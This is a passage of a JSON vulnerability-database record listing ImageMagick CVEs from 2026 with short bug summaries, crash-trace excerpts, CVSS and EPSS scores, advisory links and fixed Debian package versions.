"" } ], "url": "https://github.com/advisories/GHSA-6j5f-24fw-pqp4" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25897", "GHSA-6j5f-24fw-pqp4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5uyd-bv33-h7g1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/25110?format=api", "vulnerability_id": "VCID-5zkt-kcgx-a3e2", "summary": "ImageMagick Has Signed Integer Overflow in SIXEL Decoder, Leading to Memory Corruption\nA signed integer overflow vulnerability in ImageMagick's SIXEL decoder allows an attacker to trigger memory corruption and denial of service when processing a maliciously crafted SIXEL image file. The vulnerability occurs during buffer reallocation operations where pointer arithmetic using signed 32-bit integers overflows.\n\n```\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==143838==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000\n #0 0x7f379d5adb53 (/lib/x86_64-linux-gnu/libc.so.6+0xc4b53)\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25970.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25970.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25970", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17714", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17989", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18043", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17743", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17831", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17892", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17908", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17864", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17815", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17757", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17767", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17805", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25970" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25970", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25970" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xg29-8ghv-v4xr", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xg29-8ghv-v4xr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25970", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25970" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442108", "reference_id": "2442108", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442108" }, { "reference_url": "https://github.com/advisories/GHSA-xg29-8ghv-v4xr", "reference_id": "GHSA-xg29-8ghv-v4xr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xg29-8ghv-v4xr" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25970", "GHSA-xg29-8ghv-v4xr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5zkt-kcgx-a3e2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21856?format=api", "vulnerability_id": "VCID-62ar-kwbq-nyh3", "summary": "ImageMagick has memory leak in msl encoder\nMemory leak exists in `coders/msl.c`. In the `WriteMSLImage` function of the `msl.c` file, resources are allocated. But the function returns early without releasing these allocated resources. \n\n```\n==78983== Memcheck, a memory error detector\n==78983== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.\n==78983== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info\n==78983== \n==78983== 177,196 (13,512 direct, 163,684 indirect) bytes in 1 blocks are definitely lost in loss record 21 of 21\n==78983== at 0x4846828: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25638.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25638.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25638", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05112", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05082", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04924", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04978", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04997", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05015", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05035", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05019", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04968", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18616", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25638" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25638", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25638" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/1e88fca11c7b8517100d518bc99bd8c474f02f88", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/1e88fca11c7b8517100d518bc99bd8c474f02f88" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gxcx-qjqp-8vjw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gxcx-qjqp-8vjw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25638", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25638" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442105", "reference_id": "2442105", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442105" }, { "reference_url": "https://github.com/advisories/GHSA-gxcx-qjqp-8vjw", "reference_id": "GHSA-gxcx-qjqp-8vjw", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gxcx-qjqp-8vjw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25638", "GHSA-gxcx-qjqp-8vjw" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-62ar-kwbq-nyh3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24835?format=api", "vulnerability_id": "VCID-6h7x-3rue-kucp", "summary": "ImageMagick has a heap buffer over-read via 32-bit integer overflow in MAT decoder\nIn MAT decoder uses 32-bit arithmetic due to incorrect parenthesization resulting in a heap over-read.\n\n```\n=================================================================\n==969652==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x506000003b40 at pc 0x555557b2a926 bp 0x7fffffff4c80 sp 0x7fffffff4c70\nREAD of size 8 at 0x506000003b40 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28692.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28692.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28692", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05673", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05647", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05608", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05611", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05574", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06264", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06139", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06135", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06128", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06089", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.061", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06248", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28692" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28692", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28692" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mrmj-x24c-wwcv", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T15:58:29Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mrmj-x24c-wwcv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28692", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28692" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445890", "reference_id": "2445890", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445890" }, { "reference_url": "https://github.com/advisories/GHSA-mrmj-x24c-wwcv", "reference_id": "GHSA-mrmj-x24c-wwcv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mrmj-x24c-wwcv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28692", "GHSA-mrmj-x24c-wwcv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6h7x-3rue-kucp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351736?format=api", "vulnerability_id": "VCID-6v1d-1wfr-vqd1", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service via heap use-after-free in XMP profile processing", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40311.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40311.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40311", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03186", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03313", "published_at": "2026-04-18T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00319", "published_at": "2026-04-21T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.0032", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40311" }, { "reference_url": 